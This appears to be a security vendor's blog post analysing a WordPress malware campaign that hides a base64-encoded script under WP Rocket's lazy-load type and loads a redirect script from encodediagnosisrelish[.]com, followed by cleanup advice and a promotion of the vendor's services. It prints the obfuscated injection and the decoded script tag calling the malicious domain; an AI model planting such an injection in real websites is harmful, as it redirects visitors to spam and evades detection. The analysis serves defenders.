One of our security analysts discovered this new JS malware injection on one of the compromised websites that we were working on fixing it.
The malware injection is utilizing the WordPress WP Rocket plugin “rocketlazyloadscript” feature to delay the execution of this malicious javascript to remain stealthy and undetected as long as possible
Now, It’s spreading quickly and we’re seeing it on more websites everyday. Hackers are actively exploiting and targeting websites injecting their malicious JavaScript code into files and database mostly injected and found in the wp_options table so it needs to be removed from the database and any affected or infected files too.
encodediagnosisrelish[.]com is the most used malicious domain in this malware campaign so far. Both domains were recently registered on April 25th 2024 as shown below:
Domain Name: ENCODEDIAGNOSISRELISH[.]COM
Registry Domain ID: 2875559155_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.enom.com
Registrar URL: http://www.enomdomains.com
Updated Date: 2024-04-25T14:41:30Z
Creation Date: 2024-04-25T14:41:30Z
Registry Expiry Date: 2025-04-25T14:41:30Z
To illustrate the impact of encodediagnosisrelish[.]com malware and MoeSec.com’s involvement, we present the following example and screenshot:
<script type=”rocketlazyloadscript”>document.write(atob(“PHNjcmlwdCH..SKIPPED..”));</script>
As shown in the above code snippet and screenshot, The malicious part is base64 encoded and It’s trying to delay the execution of this malicious javascript by using rocketlazyloadscript on this line to remain stealthy and undetected as long as possible.
This is how it looks like after decoding the javascript code:
“<script type=’text/javascript’ src=’//encodediagnosisrelish[.]com/71/0d/40/710d40f81b147f8a985e1731b1741b0c.js’></script>”
It’s then redirecting users to random spam websites and serving ads and popups.
How to remove this infection?
You can query your database or search your files for any of the above code or domain and remove it followed by updating all used plugins and themes and remove unused ones, Change all passwords and implement security measures to protect your website from future attacks.
MoeSec.com’s Role in Combating Malware infection:
MoeSec.com, a trusted website security service provider, offers comprehensive protection against malware infections, including encodediagnosisrelish[.]com. By employing state-of-the-art security measures, MoeSec.com helps website owners detect, remove, and prevent malware infections.
Let’s take a closer look at how MoeSec.com tackles the threat of encodediagnosisrelish[.]com:
1. Malware Detection:
MoeSec.com utilizes deep AI and heuristic scanning techniques to identify the presence of encodediagnosisrelish[.]com malware or any abnormal behaviors within a website’s code. By conducting regular scans, the service can quickly detect potential threats and take appropriate action.
2. Malware Removal and Cleanup:
Upon identifying malware, MoeSec.com’s certified security experts promptly initiate the removal and cleanup process. This involves thoroughly cleaning the website’s files and database, eliminating injected malware, spam, phishing attempts, backdoors, and malicious users. Additionally, MoeSec.com ensures that the website is removed from all blacklists.
3. Website Firewall Protection:
To safeguard websites from future attacks, MoeSec.com deploys a cloud-based website firewall (WAF). This advanced security measure actively blocks malicious traffic and implements protective measures to prevent potential threats. By employing the latest security protocols, MoeSec.com fortifies websites against encodediagnosisrelish[.]com and other malware attacks.
